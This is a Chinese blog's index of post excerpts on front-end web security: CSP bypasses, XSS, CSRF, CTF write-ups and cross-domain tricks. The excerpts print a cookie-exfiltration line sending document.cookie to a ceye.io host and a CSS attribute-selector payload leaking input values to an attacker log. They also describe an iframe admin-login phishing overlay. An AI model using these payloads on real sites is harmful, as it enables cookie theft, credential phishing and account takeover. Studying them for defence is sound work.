随笔分类 - 前端
摘要:看csp规则,默认是在当前域内,允许执行内联js。如果这是一道ctf的话,就很简单了, window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe
阅读全文
posted @ 2020-05-03 14:08
Afant1
摘要:1.用h5对象上传表单(图片) 请求体 1.用h5对象上传表单(txt) 请求体 2.使用原生js上传表单数据 通过余弦这个网站辅助生成表单 请求体: HCTF share的详解ajax构造表单: https://xz.aliyun.com/t/3258 xss上传表单 http://sec2hac
阅读全文
摘要:payload: input[value^='a'] { background-image: url(http://localhost/css-improved/attacker/log.php/a); }input[value^='ab'] { background-image: url(http
阅读全文
摘要:同域下,即使设置了cookie的路径还是能将不同路径cookie读出来。 1.在/ctf/day3/ 目录设置一个cookie 2.其他目录下是不能访问这个cookie的 3.通过iframe可以实现跨目录读取cookie 总结:通过设置path不能防止cookie被盗取。
阅读全文
摘要:iframe的子操作父窗口,父操作子窗口: test.php: a.html 子操作父窗口: 父操作子: 以上是在同域下操作的,可对不同页面读写操作, 如果将iframe的srcs修改为<iframe src="http://www.123.com/csp/a.html" id="iframe"><
阅读全文
摘要:iframe.php代码如下: allow-popups开启时,window.open就可以打开新的窗口。 看csp规则,默认是在当前域内,如果这是一个ctf题的话,就很简单了,window.location.href='http://aa.xxxx.ceye.io?'+document.cooki
阅读全文
摘要:1、self-xss+302跳转构造csrf的利用: 1、login.php 存在跳转2、http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html 通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章
阅读全文
摘要:页面目录如下: register.php注册页面。 user.php可发送消息给其他用户。 profile.php可配置参数添加用户头像(加载eval js文件)。 static存在redirect.php重定向页面。 看下csp规则: 1、script没有开启unsafe-inline,也就是说不
阅读全文
摘要:1、load方法 使用load()方法通过Ajax请求加载服务器中的数据,并把返回的数据放置到指定的元素中,它的调用格式为: $(selector).load(URL,data,callback); 参数url为加载服务器地址,可选项data参数为请求时发送的数据,callback参数为数据请求成功
阅读全文
摘要:1、html事件处理程序 2、dom0级事件处理程序 3、dom2级事件处理程序 优点支持多个事件绑定 兼容性问题:chrome支持addEventListener,ie支持attachEvent 支持chrome和低版本ie的: 事件对象 eventUtil.addHandler(document
阅读全文
摘要:常见解决跨域问题的方案 在web开方中,解决跨域问题最常见的方法有: document.domain+iframe(子域名代理) jsonp实现跨域 CORS跨域资源共享 postMessage实现跨域 1、document.domain+iframe(子域名代理) .对于主域相同而子域不同的情况,
阅读全文
摘要:自己写一个和原网站后台登录地址一模一样的钓鱼页面 JS加载一个iframe 100%覆盖原网页 提示登录超时重新登录 因为是iframe加载 url地址不变 钓鱼成功后 再跳转回/admin/index.php 因为目标session没过期 所以可以极大程度的模拟正常的登录成功操作。 注入如下代码:
阅读全文
摘要:前提得浏览器支持webRTC,测试的时候google浏览器测试成功,火狐浏览器不支持webRTC, 再在xss平台直接复制如下js代码: 下面是服务器接受到的ip: 接下来就是可以内网渗透了。
阅读全文
摘要:今天玩了一天的xss。 分享几个xss game https://xss.haozi.me/#/0x00 http://47.94.13.75/test/ writeup:http://www.cnblogs.com/r00tuser/p/7411959.html http://prompt.ml/
阅读全文
摘要:当网站cookie设置了httponly,xss获取不到到网站的cookie。但是我们是可以获取到网站后台的url。 这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删除用户,修改密码,数据库备份等等。 在这个xss点上,用ajax构造post数据包,添加用户。这就应
阅读全文
摘要:参考:http://www.cnblogs.com/dowinning/archive/2012/04/19/json-jsonp-jquery.html
阅读全文


浙公网安备 33010602011771号